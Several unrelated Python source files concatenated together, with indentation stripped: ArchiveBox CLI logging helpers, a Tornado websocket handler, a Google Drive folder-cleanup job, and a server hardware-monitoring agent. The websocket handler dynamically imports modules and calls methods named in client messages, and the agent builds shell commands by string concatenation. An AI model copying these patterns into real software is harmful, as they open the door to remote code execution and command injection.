# stderr('READING STDIN TO REJECT...')
stdin_raw_text = stdin.read()
if stdin_raw_text.strip():
# stderr('GOT STDIN!', len(stdin_str))
stderr(f'[!] The "{caller}" command does not accept stdin (ignoring).', color='red')
stderr(f' Run archivebox "{caller} --help" to see usage and examples.')
stderr()
# raise SystemExit(1)
return None
def accept_stdin(stdin: Optional[IO]=sys.stdin) -> Optional[str]:
"""accept any standard input and return it as a string or None"""
if not stdin:
return None
if not stdin.isatty():
# stderr('READING STDIN TO ACCEPT...')
stdin_str = stdin.read()
if stdin_str:
# stderr('GOT STDIN...', len(stdin_str))
return stdin_str
return None
class TimedProgress:
"""Show a progress bar and measure elapsed time until .end() is called"""
def __init__(self, seconds, prefix=''):
self.SHOW_PROGRESS = SHOW_PROGRESS
if self.SHOW_PROGRESS:
self.p = Process(target=progress_bar, args=(seconds, prefix))
self.p.start()
self.stats = {'start_ts': datetime.now(timezone.utc), 'end_ts': None}
def end(self):
"""immediately end progress, clear the progressbar line, and save end_ts"""
end_ts = datetime.now(timezone.utc)
self.stats['end_ts'] = end_ts
if self.SHOW_PROGRESS:
# terminate if we havent already terminated
try:
# kill the progress bar subprocess
try:
self.p.close() # must be closed *before* its terminnated
except (KeyboardInterrupt, SystemExit):
print()
raise
except BaseException: # lgtm [py/catch-base-exception]
pass
self.p.terminate()
self.p.join()
# clear whole terminal line
try:
sys.stdout.write('\r{}{}\r'.format((' ' * TERM_WIDTH()), ANSI['reset']))
except (IOError, BrokenPipeError):
# ignore when the parent proc has stopped listening to our stdout
pass
except ValueError:
pass
@enforce_types
def progress_bar(seconds: int, prefix: str='') -> None:
"""show timer in the form of progress bar, with percentage and seconds remaining"""
chunk = '█' if PYTHON_ENCODING == 'UTF-8' else '#'
last_width = TERM_WIDTH()
chunks = last_width - len(prefix) - 20 # number of progress chunks to show (aka max bar width)
try:
for s in range(seconds * chunks):
max_width = TERM_WIDTH()
if max_width < last_width:
# when the terminal size is shrunk, we have to write a newline
# otherwise the progress bar will keep wrapping incorrectly
sys.stdout.write('\r\n')
sys.stdout.flush()
chunks = max_width - len(prefix) - 20
pct_complete = s / chunks / seconds * 100
log_pct = (log(pct_complete or 1, 10) / 2) * 100 # everyone likes faster progress bars ;)
bar_width = round(log_pct/(100/chunks))
last_width = max_width
# ████████████████████ 0.9% (1/60sec)
sys.stdout.write('\r{0}{1}{2}{3} {4}% ({5}/{6}sec)'.format(
prefix,
ANSI['green' if pct_complete < 80 else 'lightyellow'],
(chunk * bar_width).ljust(chunks),
ANSI['reset'],
round(pct_complete, 1),
round(s/chunks),
seconds,
))
sys.stdout.flush()
time.sleep(1 / chunks)
# ██████████████████████████████████ 100.0% (60/60sec)
sys.stdout.write('\r{0}{1}{2}{3} {4}% ({5}/{6}sec)'.format(
prefix,
ANSI['red'],
chunk * chunks,
ANSI['reset'],
100.0,
seconds,
seconds,
))
sys.stdout.flush()
# uncomment to have it disappear when it hits 100% instead of staying full red:
# time.sleep(0.5)
# sys.stdout.write('\r{}{}\r'.format((' ' * TERM_WIDTH()), ANSI['reset']))
# sys.stdout.flush()
except (KeyboardInterrupt, BrokenPipeError):
print()
def log_cli_command(subcommand: str, subcommand_args: List[str], stdin: Optional[str], pwd: str):
cmd = ' '.join(('archivebox', subcommand, *subcommand_args))
stderr('{black}[i] [{now}] ArchiveBox v{VERSION}: {cmd}{reset}'.format(
now=datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M:%S'),
VERSION=VERSION,
cmd=cmd,
**ANSI,
))
stderr('{black} > {pwd}{reset}'.format(pwd=pwd, **ANSI))
stderr()
### Parsing Stage
def log_importing_started(urls: Union[str, List[str]], depth: int, index_only: bool):
_LAST_RUN_STATS.parse_start_ts = datetime.now(timezone.utc)
print('{green}[+] [{}] Adding {} links to index (crawl depth={}){}...{reset}'.format(
_LAST_RUN_STATS.parse_start_ts.strftime('%Y-%m-%d %H:%M:%S'),
len(urls) if isinstance(urls, list) else len(urls.split('\n')),
depth,
' (index only)' if index_only else '',
**ANSI,
))
def log_source_saved(source_file: str):
print(' > Saved verbatim input to {}/{}'.format(SOURCES_DIR_NAME, source_file.rsplit('/', 1)[-1]))
def log_parsing_finished(num_parsed: int, parser_name: str):
_LAST_RUN_STATS.parse_end_ts = datetime.now(timezone.utc)
print(' > Parsed {} URLs from input ({})'.format(num_parsed, parser_name))
def log_deduping_finished(num_new_links: int):
print(' > Found {} new URLs not already in index'.format(num_new_links))
def log_crawl_started(new_links):
print()
print('{green}[*] Starting crawl of {} sites 1 hop out from starting point{reset}'.format(len(new_links), **ANSI))
### Indexing Stage
def log_indexing_process_started(num_links: int):
start_ts = datetime.now(timezone.utc)
_LAST_RUN_STATS.index_start_ts = start_ts
print()
print('{black}[*] [{}] Writing {} links to main index...{reset}'.format(
start_ts.strftime('%Y-%m-%d %H:%M:%S'),
num_links,
**ANSI,
))
def log_indexing_process_finished():
end_ts = datetime.now(timezone.utc)
_LAST_RUN_STATS.index_end_ts = end_ts
def log_indexing_started(out_path: str):
if IS_TTY:
sys.stdout.write(f' > ./{Path(out_path).relative_to(OUTPUT_DIR)}')
def log_indexing_finished(out_path: str):
print(f'\r √ ./{Path(out_path).relative_to(OUTPUT_DIR)}')
### Archiving Stage
def log_archiving_started(num_links: int, resume: Optional[float]=None):
start_ts = datetime.now(timezone.utc)
_LAST_RUN_STATS.archiving_start_ts = start_ts
print()
if resume:
print('{green}[▶] [{}] Resuming archive updating for {} pages starting from {}...{reset}'.format(
start_ts.strftime('%Y-%m-%d %H:%M:%S'),
num_links,
resume,
**ANSI,
))
else:
print('{green}[▶] [{}] Starting archiving of {} snapshots in index...{reset}'.format(
start_ts.strftime('%Y-%m-%d %H:%M:%S'),
num_links,
**ANSI,
))
def log_archiving_paused(num_links: int, idx: int, timestamp: str):
end_ts = datetime.now(timezone.utc)
_LAST_RUN_STATS.archiving_end_ts = end_ts
print()
print('\n{lightyellow}[X] [{now}] Downloading paused on link {timestamp} ({idx}/{total}){reset}'.format(
**ANSI,
now=end_ts.strftime('%Y-%m-%d %H:%M:%S'),
idx=idx+1,
timestamp=timestamp,
total=num_links,
))
print()
print(' Continue archiving where you left off by running:')
print(' archivebox update --resume={}'.format(timestamp))
def log_archiving_finished(num_links: int):
from core.models import Snapshot
end_ts = datetime.now(timezone.utc)
_LAST_RUN_STATS.archiving_end_ts = end_ts
assert _LAST_RUN_STATS.archiving_start_ts is not None
seconds = end_ts.timestamp() - _LAST_RUN_STATS.archiving_start_ts.timestamp()
if seconds > 60:
duration = '{0:.2f} min'.format(seconds / 60)
else:
duration = '{0:.2f} sec'.format(seconds)
print()
print('{}[√] [{}] Update of {} pages complete ({}){}'.format(
ANSI['green'],
end_ts.strftime('%Y-%m-%d %H:%M:%S'),
num_links,
duration,
ANSI['reset'],
))
print(' - {} links skipped'.format(_LAST_RUN_STATS.skipped))
print(' - {} links updated'.format(_LAST_RUN_STATS.succeeded + _LAST_RUN_STATS.failed))
print(' - {} links had errors'.format(_LAST_RUN_STATS.failed))
if Snapshot.objects.count() < 50:
print()
print(' {lightred}Hint:{reset} To manage your archive in a Web UI, run:'.format(**ANSI))
print(' archivebox server 0.0.0.0:8000')
def log_link_archiving_started(link: "Link", link_dir: str, is_new: bool):
# [*] [2019-03-22 13:46:45] "Log Structured Merge Trees - ben stopford"
# http://www.benstopford.com/2015/02/14/log-structured-merge-trees/
# > output/archive/1478739709
print('\n[{symbol_color}{symbol}{reset}] [{symbol_color}{now}{reset}] "{title}"'.format(
symbol_color=ANSI['green' if is_new else 'black'],
symbol='+' if is_new else '√',
now=datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M:%S'),
title=link.title or link.base_url,
**ANSI,
))
print(' {blue}{url}{reset}'.format(url=link.url, **ANSI))
print(' {} {}'.format(
'>' if is_new else '√',
pretty_path(link_dir),
))
def log_link_archiving_finished(link: "Link", link_dir: str, is_new: bool, stats: dict, start_ts: datetime):
total = sum(stats.values())
if stats['failed'] > 0 :
_LAST_RUN_STATS.failed += 1
elif stats['skipped'] == total:
_LAST_RUN_STATS.skipped += 1
else:
_LAST_RUN_STATS.succeeded += 1
size = get_dir_size(link_dir)
end_ts = datetime.now(timezone.utc)
duration = str(end_ts - start_ts).split('.')[0]
print(' {black}{} files ({}) in {}s {reset}'.format(size[2], printable_filesize(size[0]), duration, **ANSI))
def log_archive_method_started(method: str):
print(' > {}'.format(method))
def log_archive_method_finished(result: "ArchiveResult"):
"""quote the argument with whitespace in a command so the user can
copy-paste the outputted string directly to run the cmd
"""
# Prettify CMD string and make it safe to copy-paste by quoting arguments
quoted_cmd = ' '.join(
'"{}"'.format(arg) if ' ' in arg else arg
for arg in result.cmd
)
if result.status == 'failed':
if result.output.__class__.__name__ == 'TimeoutExpired':
duration = (result.end_ts - result.start_ts).seconds
hint_header = [
'{lightyellow}Extractor timed out after {}s.{reset}'.format(duration, **ANSI),
]
else:
hint_header = [
'{lightyellow}Extractor failed:{reset}'.format(**ANSI),
' {reset}{} {red}{}{reset}'.format(
result.output.__class__.__name__.replace('ArchiveError', ''),
result.output,
**ANSI,
),
]
# Prettify error output hints string and limit to five lines
hints = getattr(result.output, 'hints', None) or ()
if hints:
if isinstance(hints, (list, tuple, type(_ for _ in ()))):
hints = [hint.decode() for hint in hints if isinstance(hint, bytes)]
else:
if isinstance(hints, bytes):
hints = hints.decode()
hints = hints.split('\n')
hints = (
' {}{}{}'.format(ANSI['lightyellow'], line.strip(), ANSI['reset'])
for line in hints[:5] if line.strip()
)
# Collect and prefix output lines with indentation
output_lines = [
*hint_header,
*hints,
'{}Run to see full output:{}'.format(ANSI['lightred'], ANSI['reset']),
*([' cd {};'.format(result.pwd)] if result.pwd else []),
' {}'.format(quoted_cmd),
]
print('\n'.join(
' {}'.format(line)
for line in output_lines
if line
))
print()
def log_list_started(filter_patterns: Optional[List[str]], filter_type: str):
print('{green}[*] Finding links in the archive index matching these {} patterns:{reset}'.format(
filter_type,
**ANSI,
))
print(' {}'.format(' '.join(filter_patterns or ())))
def log_list_finished(links):
from .index.csv import links_to_csv
print()
print('---------------------------------------------------------------------------------------------------')
print(links_to_csv(links, cols=['timestamp', 'is_archived', 'num_outputs', 'url'], header=True, ljust=16, separator=' | '))
print('---------------------------------------------------------------------------------------------------')
print()
def log_removal_started(links: List["Link"], yes: bool, delete: bool):
print('{lightyellow}[i] Found {} matching URLs to remove.{reset}'.format(len(links), **ANSI))
if delete:
file_counts = [link.num_outputs for link in links if Path(link.link_dir).exists()]
print(
f' {len(links)} Links will be de-listed from the main index, and their archived content folders will be deleted from disk.\n'
f' ({len(file_counts)} data folders with {sum(file_counts)} archived files will be deleted!)'
)
else:
print(
' Matching links will be de-listed from the main index, but their archived content folders will remain in place on disk.\n'
' (Pass --delete if you also want to permanently delete the data folders)'
)
if not yes:
print()
print('{lightyellow}[?] Do you want to proceed with removing these {} links?{reset}'.format(len(links), **ANSI))
try:
assert input(' y/[n]: ').lower() == 'y'
except (KeyboardInterrupt, EOFError, AssertionError):
raise SystemExit(0)
def log_removal_finished(all_links: int, to_remove: int):
if all_links == 0:
print()
print('{red}[X] No matching links found.{reset}'.format(**ANSI))
else:
print()
print('{red}[√] Removed {} out of {} links from the archive index.{reset}'.format(
to_remove,
all_links,
**ANSI,
))
print(' Index now contains {} links.'.format(all_links - to_remove))
def log_shell_welcome_msg():
from .cli import list_subcommands
print('{green}# ArchiveBox Imports{reset}'.format(**ANSI))
print('{green}from core.models import Snapshot, User{reset}'.format(**ANSI))
print('{green}from archivebox import *\n {}{reset}'.format("\n ".join(list_subcommands().keys()), **ANSI))
print()
print('[i] Welcome to the ArchiveBox Shell!')
print(' https://github.com/ArchiveBox/ArchiveBox/wiki/Usage#Shell-Usage')
print()
print(' {lightred}Hint:{reset} Example use:'.format(**ANSI))
print(' print(Snapshot.objects.filter(is_archived=True).count())')
print(' Snapshot.objects.get(url="https://example.com").as_json()')
print(' add("https://example.com/some/new/url")')
### Helpers
@enforce_types
def pretty_path(path: Union[Path, str]) -> str:
"""convert paths like .../ArchiveBox/archivebox/../output/abc into output/abc"""
pwd = Path('.').resolve()
# parent = os.path.abspath(os.path.join(pwd, os.path.pardir))
return str(path).replace(str(pwd) + '/', './')
@enforce_types
def printable_filesize(num_bytes: Union[int, float]) -> str:
for count in ['Bytes','KB','MB','GB']:
if num_bytes > -1024.0 and num_bytes < 1024.0:
return '%3.1f %s' % (num_bytes, count)
num_bytes /= 1024.0
return '%3.1f %s' % (num_bytes, 'TB')
@enforce_types
def printable_folders(folders: Dict[str, Optional["Link"]],
with_headers: bool=False) -> str:
return '\n'.join(
f'{folder} {link and link.url} "{link and link.title}"'
for folder, link in folders.items()
)
@enforce_types
def printable_config(config: ConfigDict, prefix: str='') -> str:
return f'\n{prefix}'.join(
f'{key}={val}'
for key, val in config.items()
if not (isinstance(val, dict) or callable(val))
)
@enforce_types
def printable_folder_status(name: str, folder: Dict) -> str:
if folder['enabled']:
if folder['is_valid']:
color, symbol, note = 'green', '√', 'valid'
else:
color, symbol, note, num_files = 'red', 'X', 'invalid', '?'
else:
color, symbol, note, num_files = 'lightyellow', '-', 'disabled', '-'
if folder['path']:
if Path(folder['path']).exists():
num_files = (
f'{len(os.listdir(folder["path"]))} files'
if Path(folder['path']).is_dir() else
printable_filesize(Path(folder['path']).stat().st_size)
)
else:
num_files = 'missing'
path = str(folder['path']).replace(str(OUTPUT_DIR), '.') if folder['path'] else ''
if path and ' ' in path:
path = f'"{path}"'
# if path is just a plain dot, replace it back with the full path for clarity
if path == '.':
path = str(OUTPUT_DIR)
return ' '.join((
ANSI[color],
symbol,
ANSI['reset'],
name.ljust(21),
num_files.ljust(14),
ANSI[color],
note.ljust(8),
ANSI['reset'],
path.ljust(76),
))
@enforce_types
def printable_dependency_version(name: str, dependency: Dict) -> str:
version = None
if dependency['enabled']:
if dependency['is_valid']:
color, symbol, note, version = 'green', '√', 'valid', ''
parsed_version_num = re.search(r'[\d\.]+', dependency['version'])
if parsed_version_num:
version = f'v{parsed_version_num[0]}'
if not version:
color, symbol, note, version = 'red', 'X', 'invalid', '?'
else:
color, symbol, note, version = 'lightyellow', '-', 'disabled', '-'
path = str(dependency["path"]).replace(str(OUTPUT_DIR), '.') if dependency["path"] else ''
if path and ' ' in path:
path = f'"{path}"'
return ' '.join((
ANSI[color],
symbol,
ANSI['reset'],
name.ljust(21),
version.ljust(14),
ANSI[color],
note.ljust(8),
ANSI['reset'],
path.ljust(76),
))
|
base_socketsM.py
|
import tornado.websocket
import json
from multiprocessing import Process
import definitions
SERVER = definitions.SERVER
class SuperBaseSocket(tornado.websocket.WebSocketHandler):
def open(self, id_sessions, Session):
_id = self.get_argument("id", None, True)
if not _id:
self.current_session = Session()
elif _id:
try : self.current_session = id_sessions['{}'.format(_id)]
except: self.current_session = None
if self.current_session:
pass
else:
self.current_session = Session(_id)
id_sessions['{}'.format(_id)] = self.current_session
def on_message(self, message):
json_string = u'%s' % (message)
message = json.loads(json_string)
receiver = message['receiver']
algorithm = message['algorithm']
method = message['method']
key = list(method.keys())[0]
if receiver == SERVER:
if algorithm:
translator = __import__('algorithms.{}.translator'.format(algorithm)).__dict__['{}'.format(algorithm)].__dict__['translator']
mt = Process(target=translator.__dict__[key], args=(self.current_session, method[key]))
mt.start()
#translator.__dict__[key](self.current_session, method[key])
else:
self.__getattribute__(key)(method[key])
else:
self.current_session.__getattribute__('socket_{}'.format(receiver)).send(message)
self.write_message('Sent')
def on_close(self):
pass
class SocketCFD(SuperBaseSocket):
def open(self, id_sessions, Session):
super(SocketCFD, self).open(id_sessions, Session)
print('CFD connection open')
def on_close(self):
print('Closing CFD connection')
class SocketModel3D(SuperBaseSocket):
def open(self, id_sessions, Session):
super(SocketModel3D, self).open(id_sessions, Session)
print('3D connection open')
def on_close(self):
print('Closing 3D connection')
class SocketDesign(SuperBaseSocket):
def open(self, id_sessions, Session):
super(SocketDesign, self).open(id_sessions, Session)
print('Design connection open')
def on_close(self):
print('Closing Design connection')
class SocketHandler(SuperBaseSocket):
def open(self, id_sessions, Session):
super(SocketHandler, self).open(id_sessions, Session)
print('Handler connection open')
def on_close(self):
print('Closing Handler connection')
|
drive_cleanup.py
|
import logging
import threading
from datetime import datetime, timedelta
from threading import Thread
from apiclient import discovery
logger = logging.getLogger(__name__)
DELAY_SECS = 60 * 5
MAX_FOLDER_AGE_MINS = 60 # An hour
class DriveCleanup:
SCOPES = 'https://www.googleapis.com/auth/drive'
drive = None
stopped = False
def __init__(self, credentials):
self.drive = discovery.build(serviceName='drive', version='v3', credentials=credentials)
self.stopped_event = threading.Event()
def start(self):
def job():
logger.info("Scheduled drive cleanup job")
while not self.stopped:
self._delete_old_no_raise()
self.stopped_event.wait(DELAY_SECS)
Thread(target=job).start()
return self
def stop(self):
logger.info("Stopping drive cleanup job")
self.stopped = True
self.stopped_event.set()
def _delete_old_no_raise(self):
try:
self._delete_old()
except:
logger.exception('Failed to delete old drive files')
def _delete_old(self):
logger.info("Searching for old drive folders")
now = datetime.utcnow()
max_folder_modification = (now - timedelta(minutes=MAX_FOLDER_AGE_MINS)).isoformat("T")
query = "mimeType = 'application/vnd.google-apps.folder' and modifiedTime <= '{}'" \
.format(max_folder_modification)
results = self.drive.files().list(q=query, fields="files(id, name)").execute()
files = results.get('files', [])
for file in files:
file_id = file['id']
logger.info("Deleting old folder. id=" + file_id + ', name=' + file['name'])
self.drive.files().delete(fileId=file_id).execute()
|
sys_agent_unit.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright © 2007 Free Software Foundation, Inc. <https://fsf.org/>
#
# Licensed under the GNU General Public License, version 3 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://jxself.org/translations/gpl-3.zh.shtml
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sfo_agent.kafka_producer import ProduceKafkaInfo
from sfo_common.agent import Agent
from sfo_common.import_common import *
#schedule tasks
def get_host_json_schl():
'''
起线程定时执行主机硬件信息收集
起线程避免主进程的schedule因等待函数执行完成而卡住
:return:
'''
try:
ia = InfoAcquisition()
threading.Thread(target=ia.get_host_json).start()
except Exception as ex:
logger.info("get_host_json_schl function excute exception:" + str(ex))
def get_node_json_schl():
'''
起线程定时执行主机状态数据收集
起线程避免主进程的schedule因等待函数执行完成而卡住
:return:
'''
try:
ia = InfoAcquisition()
threading.Thread(target=ia.get_node_json,args=['SfoNodeStat']).start()
except Exception as ex:
logger.exception("get_node_json_schl function excute exception:" + str(ex))
def get_node_disk_stat_json_schl():
'''
起线程定时执行disk性能数据收集
起线程避免主进程的schedule因等待函数执行完成而卡住
:return:
'''
try:
ia = InfoAcquisition()
threading.Thread(target=ia.get_node_disk_stat_json).start()
except Exception as ex:
logger.exception("get_node_disk_stat_json_schl function excute exception:" + str(ex))
def get_host_monitor_json_schl():
'''
起线程定时执行监控数据收集
起线程避免主进程的schedule因等待函数执行完成而卡住
:return:
'''
try:
ia = InfoAcquisition()
threading.Thread(target=ia.get_host_monitor_json).start()
except Exception as ex:
logger.exception("get_host_monitor_json_schl function excute exception:" + str(ex))
def get_ring_json_schl():
'''
起线程定时执行ring信息收集
起线程避免主进程的schedule因等待函数执行完成而卡住
:return:
'''
try:
ia = InfoAcquisition()
threading.Thread(target=ia.get_ring_json).start()
except Exception as ex:
logger.exception("get_ring_json_schl function excute exception:" + str(ex))
class SysUnitAgnet(Agent):
def __init__(self, pidfile):
Agent.__init__(self, pidfile)
def run(self):
'''
重写Agent的run函数,实现守护进程的指定功能
:return:
'''
try:
sys.stdout.flush()
hostname = socket.getfqdn()
hostip = socket.gethostbyname(hostname)
logger.info("hostname is {}, ip is {}".format(hostname, hostip))
# use schedule
schedule.every(config.host_refresh).seconds.do(get_host_json_schl)
schedule.every(config.node_refresh).seconds.do(get_node_json_schl)
schedule.every(config.disk_refresh).seconds.do(get_node_disk_stat_json_schl)
schedule.every(config.mon_refresh).seconds.do(get_host_monitor_json_schl)
schedule.every(config.host_refresh).seconds.do(get_ring_json_schl)
schedule.run_all(0)
while True:
schedule.run_pending()
time.sleep(1)
except Exception as ex:
logger.exception("sysunitagent was stopped by exception {}".format(str(ex)))
class HostInfo(object):
'''
主机硬件信息获取类
'''
def __init__(self):
pass
def get_os_info(self):
'''
获取操作系统版本信息
:return:
'''
osinfo = {}
try:
osinfo['host_name'] = socket.getfqdn()
osinfo['os_version'] = "-".join(platform.linux_distribution())
osinfo['os_kernel_version'] = platform.release()
return osinfo
except Exception as ex:
logger.exception("get_os_info function excute exception:" + str(ex))
def get_cpu_dev_info(self):
'''
获取CPU的硬件信息
:return:
'''
try:
result = util.excute_command('lscpu')
if result:
parser = reg_templates.CPUInfoParser(result)
return parser.parse_items()
except Exception as ex:
logger.exception("get_cpu_info function excute exception:" + str(ex))
def get_mem_dev_info(self):
'''
获取内存的硬件信息
:return:
'''
try:
result = util.excute_command('dmidecode -t memory')
if result:
parser = reg_templates.DmidecodeMemory(result)
rec = parser.parse()
return rec
except Exception as ex:
logger.exception("get_mem_dev_info function excute exception:" + str(ex))
def get_bios_dev_info(self):
'''
获取主机的BIOS信息
:return:
'''
try:
rec = {}
biosdata = util.excute_command('dmidecode -t bios')
if biosdata :
parser = reg_templates.DmidecodeBios(biosdata)
resbios = parser.parse()
if resbios.has_key('mf_bios_version'):
rec['mf_bios_version'] = resbios['mf_bios_version']
else:
rec['mf_bios_version'] = 'N/A'
if resbios.has_key('mf_bios_date'):
rec['mf_bios_date'] = resbios['mf_bios_date']
else:
rec['mf_bios_date'] = 'N/A'
sysdata = util.excute_command('dmidecode -t system')
if sysdata :
sysparser = reg_templates.DmidecodeSystem(sysdata)
ressys = sysparser.parse()
if ressys.has_key('mf_name'):
rec['mf_name'] = ressys['mf_name']
else:
rec['mf_name'] = 'N/A'
if ressys.has_key('mf_model'):
rec['mf_model'] = ressys['mf_model']
else:
rec['mf_model'] = 'N/A'
if ressys.has_key('mf_serial_number'):
rec['mf_serial_number'] = ressys['mf_serial_number']
else:
rec['mf_serial_number'] = 'N/A'
memdata = util.excute_command('dmidecode -t memory')
if memdata :
memparser = reg_templates.DmidecodeMemory(memdata)
resmem = memparser.parse()
total = 0
frq = []
sngsize = []
num = 0
if resmem.has_key('mem_single_size'):
sngs = str(resmem['mem_single_size']).split(',')
for sng in sngs:
if str(sng).strip() not in sngsize:
if str(sng).replace('MB','').strip().isdigit():
sngsize.append(str(sng).strip())
if 'MB' in sng:
tmp = str(sng).replace('MB','').strip()
if tmp.isdigit():
total += int(tmp)
num += 1
rec['mem_single_size'] = ', '.join(sngsize)
else:
rec['mem_single_size'] = 'N/A'
if resmem.has_key('mem_total'):
rec['mem_total'] = 'Max:{}, Now:{} GB'.format(resmem['mem_total'],str(total/1024))
else:
rec['mem_total'] = 'N/A'
if resmem.has_key('mem_number'):
rec['mem_number'] = 'Max:{}, Now:{}'.format(resmem['mem_number'],str(num))
else:
rec['mem_number'] = 'N/A'
if resmem.has_key('mem_frequency'):
frqs = str(resmem['mem_frequency']).split(',')
for rq in frqs:
if str(rq).strip() not in frq:
if str(rq).replace('MHz','').strip().isdigit():
frq.append(str(rq).strip())
rec['mem_frequency'] = ', '.join(frq)
else:
rec['mem_frequency'] = 'N/A'
return rec
except Exception as ex:
logger.exception("get_bios_dev_info function excute exception:" + str(ex))
def get_net_dev_info(self):
'''
获取网卡的硬件信息
:return:
'''
try:
eth = []
res = {}
eth_res = {}
mac_res = {}
ip_res = {}
ctl_res = {}
addrs = psutil.net_if_addrs()
stats = psutil.net_if_stats()
nets = addrs.keys()
for net in nets:
if 'eth' in net or 'bond' in net:
eth.append(net)
eth_res[net] = '{}Mb/s'.format(stats[net].speed)
for ip_addr in addrs[net]:
if ip_addr[0] == 2:
ip_res[net] = ip_addr[1]
if ip_addr[0] == 17:
mac_res[net] = ip_addr[1]
if not ip_res.has_key(net):
ip_res[net] = 'N/A'
# 获取指定网卡的硬件型号
ethdata = util.excute_command('ethtool -i ' + net)
ethparser = reg_templates.BusinfoParser(ethdata)
ethrec = ethparser.parse()
if ethrec.has_key('businfo'):
businfo = str(ethrec['businfo']).replace('0000:', '')
contrinfo = util.excute_command("lspci | grep -i '" + businfo + "'")
ctlinfo = contrinfo.split(':')[2]
ctl_res[net] = ctlinfo
res['net_speed'] = json.dumps(eth_res, encoding='utf-8', ensure_ascii=True)
res['net_number'] = len(eth)
res['net_mac_address'] = json.dumps(mac_res, encoding='utf-8', ensure_ascii=True)
res['net_ip_address'] = json.dumps(ip_res, encoding='utf-8', ensure_ascii=True)
res['net_model'] = json.dumps(ctl_res, encoding='utf-8', ensure_ascii=True)
return res
except Exception as ex:
logger.exception("get_net_dev_info function excute exception:" + str(ex))
def get_disk_dev_info(self):
'''
获取磁盘的硬件信息
:return:
'''
try:
rec = {}
sysdata = util.excute_command("dmidecode -t system")
factory = re.search('Manufacturer: .*',sysdata)
if factory :
fname = str(factory.group(0)).split(':')[1].strip()
if fname.upper().strip() == "HP":
rec = self.get_hp_disk_dev_info()
else:
rec = self.get_lsi_disk_dev_info()
return rec
except Exception as ex:
logger.exception("get_disk_dev_info function excute exception:" + str(ex))
def get_disk_names(self):
'''
获取主机上所有磁盘的磁盘名 (使用blkid命令,发现有些情况下部分磁盘不可见,谨慎使用)
:return:
'''
try:
result = util.excute_command('blkid')
if result :
parser = reg_templates.DiskNameParser(result)
return parser.parse()
except Exception as ex:
logger.exception("get_disk_name function excute exception:" + str(ex))
def get_hp_disk_dev_info(self):
'''
获取HP的磁盘信息
:return:
'''
try:
rec = {}
diskary = self.get_lsscsi_disk_info()
if diskary:
raid_type = {}
disk_usize = {}
disk_capacity = {}
disknum = 0
diskgroup = 0
disk_number = {}
disk_rate = {}
for ary in diskary:
if ary is None:
continue
aryid = str(ary['disk_lname']).replace('/dev/sd','').upper()
lcmdstr = 'hpssacli ctrl slot=0 array {} ld all show'.format(aryid)
pcmdstr = 'hpssacli ctrl slot=0 array {} pd all show'.format(aryid)
ldata = util.excute_command(lcmdstr)
pdata = util.excute_command(pcmdstr)
if ldata and 'Error' not in ldata:
diskgroup += 1
m_data = re.findall('\(.*\)',ldata)
if len(m_data) > 1:
for dt in m_data:
if 'OK' in dt:
if len(str(dt).split(',')) > 2:
raid_type[ary['disk_lname']] = str(str(dt).split(',')[1])
disk_usize[ary['disk_lname']] = str(str(dt).split(',')[0]).replace('(','')
if pdata and 'Error' not in pdata:
tp = []
sz = []
mydata = re.findall('\(.*\)', pdata)
if len(mydata) > 1:
for data in mydata:
if 'OK' in data:
disknum += 1
mdata = str(data).split(',')
if len(mdata) > 2:
tp.append(str(mdata[1]).strip())
sz.append(str(mdata[2]).strip())
if len(tp) > 0 and len(sz) > 0:
dtype = ','.join(tp)
dsize = ','.join(sz)
disk_capacity[ary['disk_lname']] = '{}-{}'.format(dsize,dtype)
disk_number['disknum'] = disknum
disk_number['diskgroup'] = diskgroup
rec['disk_type'] = json.dumps(raid_type, encoding='utf-8', ensure_ascii=True)
rec['disk_number'] = json.dumps(disk_number, encoding='utf-8', ensure_ascii=True)
rec['disk_useful_size'] = json.dumps(disk_usize, encoding='utf-8', ensure_ascii=True)
rec['disk_capacity'] = json.dumps(disk_capacity, encoding='utf-8', ensure_ascii=True)
rec['disk_rw_rate'] = json.dumps(disk_rate, encoding='utf-8', ensure_ascii=True)
return rec
except Exception as ex:
logger.exception("get_hp_disk_dev_info function excute exception:" + str(ex))
def get_lsi_disk_dev_info(self):
'''
获取LSI厂商的磁盘信息
:return:
'''
try:
rec = {}
diskgroups = self.get_lsscsi_disk_info()
if diskgroups:
raid_type = {}
disk_usize = {}
disk_capacity = {}
disknum = 0
diskgroup = 0
disk_number = {}
disk_rate = {}
for group in diskgroups:
if str(group['disk_manufacturer']).upper().strip() == "HP":
raise RuntimeError('This Raid card is not supported!')
ids = str(group['disk_id']).split(':')
groupinfo = self.get_lsi_diskgroup_info(ids[0],str("DISK GROUP: {}".format(str(ids[2]))),str("DISK GROUP: {}".format(str(int(ids[2])+1))))
if groupinfo and str(groupinfo) <> "N/A":
diskgroup += 1
groupparser = reg_templates.DiskGroupParser(groupinfo)
grouprec = groupparser.parse()
if grouprec.has_key('raid_type'):
raid_type[group['disk_lname']] = "Raid {}".format(str(grouprec['raid_type']))
if grouprec.has_key('disk_num'):
disknum += int(grouprec['disk_num'])
if grouprec.has_key('disk_size'):
disk_usize[group['disk_lname']] = str(grouprec['disk_size'])
if grouprec.has_key('disk_capacity') and grouprec.has_key('disk_type'):
disk_capacity[group['disk_lname']] = "{}-{}".format(str(grouprec['disk_capacity']),str(grouprec['disk_type']))
if grouprec.has_key('disk_rw_rate'):
disk_rate[group['disk_lname']] = str(grouprec['disk_rw_rate'])
disk_number['disknum'] = disknum
disk_number['diskgroup'] = diskgroup
rec['disk_type'] = json.dumps(raid_type,encoding='utf-8',ensure_ascii=True)
rec['disk_number'] = json.dumps(disk_number,encoding='utf-8',ensure_ascii=True)
rec['disk_useful_size'] = json.dumps(disk_usize,encoding='utf-8',ensure_ascii=True)
rec['disk_capacity'] = json.dumps(disk_capacity,encoding='utf-8',ensure_ascii=True)
rec['disk_rw_rate'] = json.dumps(disk_rate,encoding='utf-8',ensure_ascii=True)
return rec
except Exception as ex:
logger.exception("get_lsi_disk_dev_info function excute exception:" + str(ex))
def get_lsscsi_disk_info(self):
'''
获取逻辑磁盘列表,返回一个集合
:return:
'''
try:
scsirec = []
scsidata = util.exct_cmd('lsscsi')
for data in scsidata:
disk = {}
if data:
